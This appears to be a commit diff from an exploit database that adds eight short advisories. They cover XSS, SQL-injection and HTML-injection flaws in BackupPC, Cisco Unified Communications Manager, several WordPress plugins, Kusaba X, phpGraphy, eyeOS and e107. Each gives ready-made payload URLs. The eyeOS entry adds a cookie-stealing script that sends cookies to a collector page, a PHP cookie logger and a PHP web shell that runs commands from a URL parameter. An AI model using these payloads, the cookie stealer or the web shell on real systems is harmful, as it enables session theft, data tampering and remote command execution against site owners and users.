Update: 2015-01-04
8 new exploits
This commit is contained in:
parent
d83f13c6d1
commit
e60ec300be
9 changed files with 2439 additions and 2305 deletions
8
platforms/cgi/webapps/35676.txt
Executable file
8
platforms/cgi/webapps/35676.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/47628/info
|
||||
|
||||
BackupPC is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/index.cgi?action=browse&host=localhost&num=99999%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
|
||||
http://www.example.com/index.cgi?action=RestoreFile&host=localhost&num=1&share=%3Cscript%3Ealert%28234%29%3C/script%3E&dir=
|
8
platforms/jsp/webapps/35672.txt
Executable file
8
platforms/jsp/webapps/35672.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/47607/info
|
||||
|
||||
Cisco Unified Communications Manager is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an authenticated attacker to compromise the affected device, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/ccmcip/xmldirectorylist.jsp?f=vsr'||0/1%20OR%201=1))%20--
|
||||
http://www.example.com/ccmcip/xmldirectorylist.jsp?f=vsr'||1/0%20OR%201=1))%20--
|
9
platforms/php/webapps/35673.txt
Executable file
9
platforms/php/webapps/35673.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47620/info
|
||||
|
||||
The Daily Maui Photo Widget plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Daily Maui Photo Widget plugin 0.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wp-content/plugins/daily-maui-photo-widget/wp-dailymaui-widget-control.php?title=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
|
9
platforms/php/webapps/35674.txt
Executable file
9
platforms/php/webapps/35674.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47622/info
|
||||
|
||||
The WP Photo Album plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
WP Photo Album 1.5.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wp-admin/admin.php?page=wp-photo-album/wppa.php&tab=del&id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
|
9
platforms/php/webapps/35675.txt
Executable file
9
platforms/php/webapps/35675.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47626/info
|
||||
|
||||
Kusaba X is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Versions prior to Kusaba X 0.9.2 are vulnerable.
|
||||
|
||||
http://www.example.com/kusabax/animation.php?board=b&id=1"><script>alert('XSS')</script><"
|
25
platforms/php/webapps/35677.txt
Executable file
25
platforms/php/webapps/35677.txt
Executable file
|
@ -0,0 +1,25 @@
|
|||
source: http://www.securityfocus.com/bid/47629/info
|
||||
|
||||
eyeOS is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input passed through image content before using it in dynamically generated content.
|
||||
|
||||
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
|
||||
|
||||
Versions prior to eyeOS 1.9.0.3 are vulnerable.
|
||||
|
||||
<!doctype html>
|
||||
<script>
|
||||
var http = new XMLHttpRequest()
|
||||
var url = "http://localhost/report.php?" + "user=" + top.document.title + "&cookie=" + document.cookie;
|
||||
http.open("GET", url, true);
|
||||
http.send("");
|
||||
</script>
|
||||
|
||||
<?php
|
||||
$usercookies = fopen("usercookies", "a");
|
||||
fwrite($usercookies, "User: " . $_GET['user'] . "\t" ."Cookie: " . $_GET['cookie'] . "\n");
|
||||
?>
|
||||
|
||||
<?php
|
||||
system($_GET['cmd']);
|
||||
?>
|
||||
|
9
platforms/php/webapps/35678.txt
Executable file
9
platforms/php/webapps/35678.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47634/info
|
||||
|
||||
phpGraphy is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
phpGraphy 0.9.13b is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
49
platforms/php/webapps/35679.txt
Executable file
49
platforms/php/webapps/35679.txt
Executable file
|
@ -0,0 +1,49 @@
|
|||
_____ _____ ______
|
||||
| _ | | _ ||___ /
|
||||
| |/' |_ __| |_| | / /
|
||||
| /| \ \/ /\____ | / /
|
||||
\ |_/ /> < .___/ /./ /
|
||||
\___//_/\_\\____/ \_/
|
||||
by bl4ck s3c
|
||||
|
||||
|
||||
# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
|
||||
# Date: 03-01-2014
|
||||
# Google Dork : Proudly powered by e107
|
||||
# Exploit Author: Ahmet Agar / 0x97
|
||||
# Version: 2.0.0
|
||||
# Vendor Homepage: http://e107.org/
|
||||
# Tested on: OWASP Mantra & Iceweasel
|
||||
|
||||
# Vulnerability Description:
|
||||
|
||||
CMS user details section is vulnerable to XSS. You can run XSS payloads.
|
||||
|
||||
XSS Vulnerability #1:
|
||||
|
||||
Go Update user settings page
|
||||
|
||||
"http://{target-url}/usersettings.php"
|
||||
|
||||
Set Real Name value;
|
||||
|
||||
"><script>alert(String.fromCharCode(88, 83, 83))</script>
|
||||
|
||||
or
|
||||
|
||||
"><script>alert(document.cookie)</script>
|
||||
|
||||
|
||||
========
|
||||
Credits:
|
||||
========
|
||||
|
||||
Vulnerability found and advisory written by Ahmet Agar.
|
||||
|
||||
===========
|
||||
References:
|
||||
===========
|
||||
|
||||
http://www.0x97.info
|
||||
htts://twitter.com/_HacKingZ_
|
||||
|
Loading…
Add table
Reference in a new issue